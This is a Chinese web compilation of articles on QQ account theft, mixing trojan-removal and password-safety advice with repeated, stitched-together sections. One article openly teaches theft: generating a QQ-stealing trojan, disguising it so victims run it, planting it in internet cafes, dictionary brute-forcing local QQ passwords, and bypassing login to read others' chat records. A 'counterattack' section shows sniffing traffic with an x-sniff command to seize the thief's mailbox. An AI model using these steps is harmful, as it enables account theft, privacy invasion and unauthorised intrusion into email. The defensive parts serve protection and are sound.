二、练就慧眼,让木马在系统中无处可逃 一起QQ网 www.e7qq.com
现在,我们已经了解了“啊拉QQ大盗”的一般流程,那么如何才能从系统中发现“啊拉QQ大盗”呢?一般来说,如果碰到了以下几种情况,那就应该小心了。
运行某一程序后其自身消失不见。
·运行某一程序后杀毒软件自动关闭。
·访问杀毒软件网站时浏览器被自动关闭。
·如果杀毒软件有邮件监控功能的,出现程序发送邮件的警告框。
·安装有网络防火墙(例如天网防火墙),出现NTdhcp.exe访问网络的警告。
出现上述情况的一种或多种,系统就有可能已经感染了“啊拉QQ大盗”。当然,感染了木马并不可怕,我们同样可以将其从系统中清除出去。
1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件,并在注册表的启动项中加入木马的键值,以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”,结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”,选择其中的“查看”标签,将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹,将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值,该键值位于HKEY_LOCAL_MACHINE\Software \Microsoft \Windows \Currentversion \Run。 div class=Lut430QQ空间代码 http://www.e7qq.com/div
2、卸载木马。卸载“啊拉QQ大盗”很简单,只要下载“啊拉QQ大盗”的配置程序,运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。
三、以退为进,给盗号者以致命一击
忙乎了半天,终于把系统中的“啊拉QQ大盗”彻底清除,那么,面对可恶的盗号者,我们是不是应该给他一个教训呢?
1、利用漏洞,由守转攻
这里所谓的“攻”,并不是直接入侵盗号者的电脑,相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手,从而给盗号者一个教训。
那么这个漏洞是什么呢?
从此前对“啊拉QQ大盗”的分析中可以看到,配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码,而邮箱的帐号和密码都是明文保存在木马程序中的。因此,我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱,让盗号者偷鸡不成反蚀把米
QQ相关 资料!
你好! 主动出击 教你夺回被人盗走的QQ号随着网络的普及,如今很多朋友最重要的交流方式都是QQ,但是QQ安全是一个大家都非常关心的话题,盗取QQ号的工具也是层出不穷,随着近年来大家安全意识的提高,大家对QQ安全有了一定的重视,但是所谓黑客借助一些工具盗取QQ号同样是非常容易的事,下面就来看看黑客是如何利用工具软件结合邮箱轻松盗取他人的QQ号码的,以便我们更加有效地防范!
一、QQ密码发送者
该软件使用比较简单,你需要具有一定的“欺骗”能力,要想成功,最关键的在于如何想方设法让对方接收并运行你的木马,然后你就可以“坐收渔利”了!
下载并解压该软件,运行其中的可执行文件,运行窗口如图1。
在此窗口中,你只要输入一个有效的邮箱,然后点击“生成QQ木马”按钮即可生成一个木马,如图2。
接下来就是把该木马发送给对方,要能让对方运行,你需要将改木马改名,比如改名为“我的FLASH”、“XX软件”等,只要能让对方信任你并点击运行该木马即可!
一旦对方运行了该软件,并再次登陆QQ,那么对方的QQ号码、密码以及对方机器IP等信息都会通过邮件发送到你设置好的邮箱,你就等着查看自己的“战功”吧,如图3。
提示:
该软件非常适合在网吧内使用,只要你在别的机器上配置好该软件,然后换一台机器上网,一旦别人用那台机器登陆QQ,当然是把他的QQ拱手相送了!
二、无敌QQ密码盗取器
该软件是一个后台监控类的盗取QQ的软件,同样需要邮箱配合使用,具体设置比较简单。
运行该软件,配置窗口如图4。
在该窗口中,你需要设置好的所使用邮箱的SMTP服务器地址及用户名和密码,为了保证信件能正常接收,设置完毕后最好点击“测试”按钮进行测试。
提示:
邮件标题不填则将以QQ号码为标题,另外,最好把“发送多少个号码”设置小点,这个功能很有用,一旦程序发送邮件的数目达到了这个数的时候就不再发送了,否则可能导致你的信箱被撑破。
三、用QQ破密使者盗取QQ
QQ破密使者是一个本地破解QQ密码的黑客工具,你可以选择字典暴力破解本地QQ密码,速度极快,并可自己设定延迟时间,下面看看具体的使用方法。
下载该软件并解压,其中“QQPW_Crack8”是安装程序,里面还有一个“破解字典”文件夹(图5),这是破解QQ密码所要用到的字典文件,里面有4个字典文件,当然你也可以自己制作一个字典工自己使用。安装完该软件后,就可以实践一下该软件的威力了!
首先运行该软件,软件主界面如图6所示。
首先你需要配置“QQ路径”,点击“浏览”按钮找到QQ的主程序,“QQ号码”一栏中自动会显示用本机登陆的QQ号码,你只要选择其中一个即可,然后需要设置“字典路径”,点击后面的“浏览”按钮,找到字典文件所在位置,比如C:\WINDOWS\Desktop\新建文件夹\QQ破密使者\破解字典\dictionary1.txt,如图7。
设置好字典文件后,你还可以设置延迟时间,然后你就可以点击“开始破解”进行破解了!该软件会用字典文件中的密码一一尝试,破解过程如图8。
提示:破解速度跟你的电脑速度有关,在破解过程中不要打开别的什么程序以免影响破解速度!这种方法非常适合于在网吧盗取别人的QQ号!
四、轻松偷窥QQ2004聊天记录
随着QQ2004Beta的推出,广大“Q友”们又一次体验了新版本带给大家的惊喜,那么QQ2004Beta在安全性方面又怎么样呢?针对QQ2004Beta 推出的“QQ2004Beta免密码登陆器”也许同样会带给你一个“惊喜”!
使用“QQ2004Beta免密码登陆器”后,输入任意密码即可登陆QQ,这样你就可以偷窥他人的好友资料及聊天记录啦!注意该软件只适用于最新版本的QQ2004Beta。
下载并解压该软件后,必须将其中的“cr-QQ2004Beta(7.13).exe”拷贝到你的QQ2004Beta安装目录,通常为“C:\Program Files\Tencent\qq”,否则直接运行该软件会出现找不到QQ.exe文件的提示!
运行QQ2004Beta安装目录下的“cr-QQ2004Beta(7.13).exe”文件,弹出窗口如图9所示。
点击“确定”按钮后弹出QQ正常的登陆界面,如图10。
这里你随便输入一个密码,然后点击“登录”即可登陆,但这时会弹出一个“请再次输入登录密码”的提示框,不要管它,但是千万不要点击“取消”,否则就QQ就自动关闭了,如图11。
这时QQ就离线登陆了,你可以查看他人的好友资料及聊天记录。需要注意的是:这样登陆的QQ聊天窗口是不能打开的,所以要查看聊天记录和好友资料,必须依次点击“菜单”→“好友与资料”→“消息管理器”才行,或者你在QQ主界面上用鼠标右击某个好友,然后选择“聊天记录”或者“查看资料”选项。
主动出击 教你夺回被人盗走的QQ号码
很多朋友都有过QQ号被盗的经历,即使用“密码保护”功能找回来后,里面的Q币也已经被盗号者洗劫一空,碰到更恶毒的盗号者,还会将你的好友统统删除,朋友们将会永远得离开你。想过反击吗?什么,反击?别开玩笑了,我们只是菜鸟,不是黑客,我们只会看看网页,聊聊天,连QQ号是怎么被盗的都不知道,还能把盗号者怎么样呢?其实喜欢盗号的所谓“黑客”们,也只是利用了一些现成的盗号工具,只要我们了解了QQ号被盗的过程,就能作出相应防范,甚至由守转攻,给盗号者以致命一击。
一、知己知彼,盗号技术不再神秘
如今,还在持续更新的QQ盗号软件已经所剩无几,其中最为著名,流传最广的则非“啊拉QQ大盗”莫属,目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单,只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种,并将它们分别发送到不同的信箱中,这也是“啊拉QQ大盗”如此流行的原因之一。接下来,便让我们先来了解一下其工作原理,以便从中找到反击的良方。
1、选择盗号模式
下载“啊拉QQ大盗”,解压后有两个文件:alaqq.exe、爱永恒,爱保姆qq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序,爱永恒,爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前,还需要设置其参数。
“邮箱收信”配置:运行alaqq.exe,出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”,在“邮箱收信”填写电子邮箱地址(建议使用程序默认的163.com网易的邮箱)。这里以邮箱n12345@163.com(密码n_12345)为例来介绍“邮箱收信”模式时的配置,并进行下文中的测试。此外,在“收信箱(靓)”和“收信箱(普)”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器,这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。
设置完毕后,我们可以来测试一下填写的内容是否正确,点击下方“测试邮箱”按钮,程序将会出现邮箱测试状态。如果测试的项目都显示成功,即可完成邮箱信息配置。
“网站收信”配置:除了选择“邮箱收信”模式之外,我们还可以选择“网站收信”模式,让盗取的QQ号码自动上传到指定的网站空间。当然,在使用之前,也需要做一些准备工作。
用FTP软件将爱永恒,爱保姆qq.asp上传支持ASP脚本的空间,运行alaqq.exe,在“Asp接口地址”中输入爱永恒,爱保姆qq.asp所在的URL地址,那么,当木马截获QQ号码信息后,就会将其保存于爱永恒,爱保姆qq.asp同目录下的qq.txt文件中。
2、设置木马附加参数
接下来我们进行高级设置。如果勾选“运行后关闭QQ”,对方一旦运行“啊拉QQ大盗”生成的木马,QQ将会在60秒后自动关闭,当对方再次登录QQ后,其QQ号码和密码会被木马所截获,并发送到盗号者的邮箱或网站空间中。此外,如果希望该木马被用于网吧环境,那就需要勾选“还原精灵自动转存”,以便系统重起后仍能运行木马。除这两项外,其他保持默认即可。
3、盗取QQ号码信息
配置完“啊拉QQ大盗”,点击程序界面中的“生成木马”,即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏,或者和其他软件捆绑后进行传播。当有人运行相应的文件后,木马会隐藏到系统中,当系统中有QQ登录时,木马便会开始工作,将相关的号码及密码截取,并按照此前的设置,将这些信息发送到邮箱或者网站空间。
二、练就慧眼,让木马在系统中无处可逃
现在,我们已经了解了“啊拉QQ大盗”的一般流程,那么如何才能从系统中发现“啊拉QQ大盗”呢?一般来说,如果碰到了以下几种情况,那就应该小心了。
·QQ自动关闭。
·运行某一程序后其自身消失不见。
·运行某一程序后杀毒软件自动关闭。
·访问杀毒软件网站时浏览器被自动关闭。
·如果杀毒软件有邮件监控功能的,出现程序发送邮件的警告框。
·安装有网络防火墙(例如天网防火墙),出现NTdhcp.exe访问网络的警告。
出现上述情况的一种或多种,系统就有可能已经感染了“啊拉QQ大盗”。当然,感染了木马并不可怕,我们同样可以将其从系统中清除出去。
1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件,并在注册表的启动项中加入木马的键值,以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”,结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”,选择其中的“查看”标签,将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹,将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值,该键值位于HKEY_LOCAL_MACHINE\Software \Microsoft \Windows \Currentversion \Run。
2、卸载木马。卸载“啊拉QQ大盗”很简单,只要下载“啊拉QQ大盗”的配置程序,运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。
三、以退为进,给盗号者以致命一击
忙乎了半天,终于把系统中的“啊拉QQ大盗”彻底清除,那么,面对可恶的盗号者,我们是不是应该给他一个教训呢?
1、利用漏洞,由守转攻
这里所谓的“攻”,并不是直接入侵盗号者的电脑,相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手,从而给盗号者一个教训。
那么这个漏洞是什么呢?
从此前对“啊拉QQ大盗”的分析中可以看到,配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码,而邮箱的帐号和密码都是明文保存在木马程序中的。因此,我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱,让盗号者偷鸡不成反蚀把米。
提示:以上漏洞仅存在于将QQ号码信息以邮件发送方式的木马,如果在配置“啊拉QQ大盗”的过程中选择使用网站接收的方式则不存在该漏洞。
2、网络嗅探,反夺盗号者邮箱
当木马截取到QQ号码和密码后,会将这些信息以电子邮件的形式发送到盗号者的邮箱,我们可以从这里入手,在木马发送邮件的过程中将网络数据包截取下来,这个被截获的数据包中就含有盗号者邮箱的帐号和密码。截取数据包时我们可以使用一些网络嗅探软件,这些嗅探软件可以很轻松得截取数据包并自动过滤出密码信息。
·x-sniff
x-sniff是一款命令行下的嗅探工具,嗅探能力十分强大,尤其适合嗅探数据包中的密码信息。
将下载下来的x-sniff解压到某个目录中,例如“c:\”,然后运行“命令提示符”,在“命令提示符”中进入x-sniff所在的目录,然后输入命令“xsiff.exe
-pass -hide -log
pass.log”即可(命令含义:在后台运行x-sniff,从数据包中过滤出密码信息,并将嗅探到的密码信息保存到同目录下的pass.log文件中)。
嗅探软件设置完毕,我们就可以正常登录QQ。此时,木马也开始运行起来,但由于我们已经运行x-sniff,木马发出的信息都将被截取。稍等片刻后,进入x-sniff所在的文件夹,打开pass.log,便可以发现x-sniff已经成功嗅探到邮箱的帐户和密码。
·sinffer
可能很多朋友对命令行下的东西都有一种恐惧感,所以我们可以使用图形化的嗅探工具来进行嗅探。例如适合新手使用的sinffer。
运行sinffer之前,我们需要安装WinPcap驱动,否则sinffer将不能正常运行。
运行sinffer。首先我们需要为sinffer.exe指定一块网卡,点击工具栏上的网卡图标,在弹出的窗口中选择自己使用的网卡,点“OK”后即可完成配置。确定以上配置后,点击sinffer工具栏中的“开始”按钮,软件即开始了嗅探工作。
接下来,我们正常登陆QQ,如果嗅探成功,就会在sinffer的界面中出现捕获的数据包,其中邮箱帐号密码信息被很清晰得罗列了出来。
得到盗号者的邮箱帐号和密码以后,我们可以将其中的QQ号码信息邮件全部删除,或者修改他的邮箱密码,给盗号者一个教训,让我们菜鸟也正义一把。如果你看到最后你会看到这句话的:小心这些软件,里面有毒的。
QQ号老是被盗,怎么回事啊?
通常,QQ被盗可以分为2类型。
1)个人因素导致号码丢失.
一般分: 忘记密码 修改密码中出错 把密码告诉他人被他人修改3种情况。
这属于个人因素,如果不是很粗心大意和喜欢把密码随便告诉别人,一般都不会出现这类问题.
另外,如果号码不是自己的,而是别人赠送你的,且对方设置过密码保护,那对方可以通过取回密码修改你的QQ密码。
2)其他因素导致号码丢失.
简单点说,就是号码被别人盗取密码。这是大部分网友丢失QQ号码的根本的原因。
一般是由于QQ密码过于简单和电脑中病毒引起的.
但是大家或许不清楚,怎么他会知道我的密码呢?
通常,黑客盗取QQ号码,只有2种方法,即 暴力破解法 和 木马盗取法。
暴力破解法的工作原则就是无穷尝试法,尝试任何种组合去登陆QQ号码,直到登陆成功。
木马盗取法,工作的原则是通过一个特定软件,预先安装在PC上,记录该机所有登陆QQ的号码及其密码,然后发送回黑客自己预设的邮箱。此法在网吧较常见,多是一些黑心的网管所设,也有部分是通过QQ文件传递,所以谨慎接受文件。
一、养成良好的QQ登陆习惯:
1、将密码设置为,数字+字母+符号组合,不要用单一的数字或字母组合.
2、设置保护密码.申请网址:http://service.tencent.com/reg/register.shtml。
3、如果在网吧上网,输入密码时,注意旁边是否有人,一定记得用网吧模式登陆,退出时删除所有聊天记录.
4、不要怕麻烦,每次登陆前最好进行一次木马扫瞄!经常升级更新你的杀毒软件,经常更新QQ的版本。
5、如果有条件,开通QQ会员也是个不错的好办法.
6、要提高警惕,如果网络正常情况下,发现QQ频繁掉线,可能就是你的号被盗了,有人在其他地方登陆你的QQ。
7、登陆时,发现提示上次登陆IP地址有误,要及时修改你的密码。
8、一定记得把个人设定里修改身份验证默认值设置为“需要身份认证才能把我加为好友”,将系统参数设置为“拒绝陌生人消息”。
9、千万不要轻易打开陌生人发给你的可疑文件。特别是EXT文件。它们很可能是木马程序或者被捆绑了木马程序的文件,如果电脑不小心中了木马,再长再复杂的密码都是无用的。
10、注意不要轻易暴露自己在腾讯注册E-mail,并注意E-mail密码设定的长度和复杂度。E-mail密码最好不要与QQ密码一样。
二、我们来简单了解一下密码是如何被盗的:
1.在网吧等公共场合使用QQ后,没有及时清除QQ密码和本地消息记录文件,攻击者会轻易地盗走密码。
2.攻击你在腾讯注册的邮箱。由于腾讯有一个忘记密码功能,它将用户的QQ密码发送到用户注册时留下的邮箱里,攻击者一旦破获这个邮箱,即可以很简单的拿到QQ密码。
3.利用远程破解软件暴力获取QQ密码(其实是很笨的方法)。
4.通过植入木马程序盗取QQ密码。
三、对策:
1、在网吧等公共场合使用QQ后,离开时一定要记得把QQ密码和本地消息记录文件清除掉。最好再更改一次密码,以防有程序记录你的密码。
2.运行QQ注册向导之前,将它的系统文件夹复制并且改名存放,离开网吧的时候将系统文件夹删除,然后把改名存放的原系统文件夹改回来。
3.必须到腾讯主页去申请密码保护功能,申请网址:tp://service.tencent.com/reg/register.shtml。这样即使别人盗用了你的密码,你也可以通过密码保护拿回你的密码。
4.不要轻易打开那些陌生可疑的文件,特别是EXE文件。它们很可能是木马程序或者被捆绑了木马程序的文件,如果电脑不小心中了木马,再长再复杂的密码都是无用的。
四、最快捷的方法检测电脑是否存在QQ盗号木马.
首先讲一下QQ键盘加密技术的原理:用户登陆的时候,通过加载QQ目录下的npkcrypt.sys驱动实现保护的.
QQ木马要实现QQ密码的截取,首先要破坏掉这个文件.目前还没有发现任何一款盗Q木马不是这样做的.当crypt.sys被破坏的情况下,QQ登陆窗口依然能启动,但在输入的密码框里就会出现一把坏的锁,木马则会利用各种方法进行修补.
知道了盗Q木马的原理,而且发现当npkcrypt.sys被破坏的时候,QQ密码框可以用Ctrl+V粘贴密码.得出一个通用的方法,在登陆QQ的时候,不要看键盘锁是否被破坏。而是随意复制一句字符串,然后在密码框按下Ctrl+V,如果不能贴粘,则没有盗Q木马,反之就要注意了.特别是在网吧或一些不清楚是否安全的机子下,这个方法是最快捷的。
还有一个误区要注意的,网上流传一种说法是:在输入密码时颠倒密码次序,比如:密码为123456,先输入56,然后用鼠标点击最前面的位置输入1234。这种说话已很深入人心了,但却不了解,很久已前的盗Q木马已经克服了这个问题。